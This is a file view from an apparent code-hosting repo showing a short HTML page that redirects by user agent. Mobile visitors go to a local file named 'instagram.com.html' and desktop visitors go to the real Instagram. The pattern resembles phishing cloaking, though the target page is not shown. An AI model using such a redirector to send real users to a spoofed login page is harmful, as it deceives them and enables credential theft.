demo-page / mobile.html.html
dfhfhfgg's picture
Upload 5 files
d674c1a verified
raw
history blame
366 Bytes
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>3...2...1 GO!</title>
</head>
<body>
<script>
function gopc() {
if (/Mobi|Android/i.test(navigator.userAgent)) {
window.location.href = './instagram.com.html';
} else {
window.location.href = 'https://www.instagram.com/';
}
}
gopc();
</script>
</body>
</html>